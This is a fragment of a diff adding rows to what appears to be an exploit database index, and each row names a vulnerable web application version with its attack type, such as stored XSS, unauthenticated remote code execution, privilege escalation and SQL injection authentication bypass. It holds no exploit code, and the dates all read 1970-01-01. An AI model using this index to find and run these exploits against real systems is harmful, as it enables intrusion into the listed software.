+50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Raven Security Associates",webapps,python, +50394,exploits/php/webapps/50394.py,"Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,DreyAnd,webapps,php, +50395,exploits/php/webapps/50395.txt,"WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated)",1970-01-01,Lotfi13-DZ,webapps,php, +50396,exploits/php/webapps/50396.txt,"Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation",1970-01-01,"Amine ismail",webapps,php, +50397,exploits/php/webapps/50397.txt,"Simple Online College Entrance Exam System 1.0 - Account Takeover",1970-01-01,"Amine ismail",webapps,php, +50398,exploits/php/webapps/50398.txt,"Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection",1970-01-01,"Amine ismail",webapps,php, +50399,exploits/php/webapps/50399.txt,"Online Enrollment Management System 1.0 - Authentication Bypass",1970-01-01,"Amine ismail",webapps,php, +50400,exploits/php/webapps/50400.txt,"Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass",1970-01-01,"Merve Oral",webapps,php, +50402,exploits/php/webapps/50402.txt,"Loan Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Merve Oral",webapps,php,